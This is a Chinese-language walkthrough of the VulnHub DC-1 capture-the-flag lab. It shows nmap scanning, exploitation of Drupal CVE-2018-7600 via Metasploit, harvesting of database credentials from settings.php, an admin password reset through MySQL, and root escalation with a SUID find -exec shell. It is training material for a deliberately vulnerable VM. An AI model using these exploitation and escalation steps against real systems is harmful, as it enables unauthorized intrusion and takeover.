下载地址:http://www.vulnhub.com/entry/dc-1,292/
官网描述翻译:
大概意思是一共有5个flag,不一定需要登录root用户但是需要有root权限?(应该就是提权吧)
下载好后解压后直接用VMware打开就行
这里把网络模式改为nat模式
开机
打开vm网络编辑器可以看到nat模式的主机都在192.168.13.0/24网段
由于不知道靶机的IP,这里需要使用kali中nmap来扫描一下同网段的存活主机。
nmap -T4 -A 192.168.13.0/24
这里可以看到192.168.13.146这个主机的应该就是靶机了。
用nmap扫描一下开放端口
nmap -T4 -p- 192.168.13.146
通过扫描结果可以得知:22、80、111、47037端口是开放的
浏览器中访问一下
这里推荐一个插件:Wappalyzer,可以识别网站的cms,服务器等
使用awvs扫描一下,安装步骤可以参考下https://www.sqlsec.com/2020/04/awvs.html
查看下扫描结果:
存在CVE-2018-7600,关于漏洞的原理的介绍:
https://xz.aliyun.com/t/2312
这里直接使用msf来利用此漏洞:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
设置一下ip然后直接exploit
查看一下当前目录下的文件
找到一个flag1.txt,查看一下里面内容
这里提示去寻找配置文件,查询得知drupal的配置文件在
cd sites/default
查看下settings.php内容
flag2提示:
爆破字典不是唯一攻击方式
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,
使用python反弹shell
python -c ‘import pty;pty.spawn("/bin/bash")’
登录mysql数据库:
mysql -udbuser -pR0ck3t
查询数据库
show databases;
进入drupualdb库查看表
查询users表中的内容
select * from user\G;
admin的密码加密了,这里去重置一下密码吧
关于drupal密码重置:
http://drupalchina.cn/node/2128
切换到/var/www目录下执行:
php scripts/password-hash.sh admin
进入drupaldb库来重置密码
update users set pass="$S$DpKlE3tSXI/B/6xmTi9qaYd/CEpkG8BK0AK6ecGPrv1LW2pPgHD0" where name ="admin";
通过浏览器来登录admin用户
这里寻找到一个flag3
flag3提示的查看passwd,然后使用-exec提权
这里在passwd中发现了flag4用户
接下来就是提权了:
首先去寻找一个属于root的有s权限的文件:
find / -perm -u=s -type f 2>/dev/null
这里使用find来提权:
touch test
find test -exec ‘/bin/sh’ ;
根据flag3的提示进入/home/flag4目录下内容
提示最后一个flag在root目录下,直接查看
至此,5个flag就全部拿到了。
总结一下这次的知识点:
nmap
awvs
msf漏洞利用
了解了drupal的一些基础知识
mysql基本命令
linux提权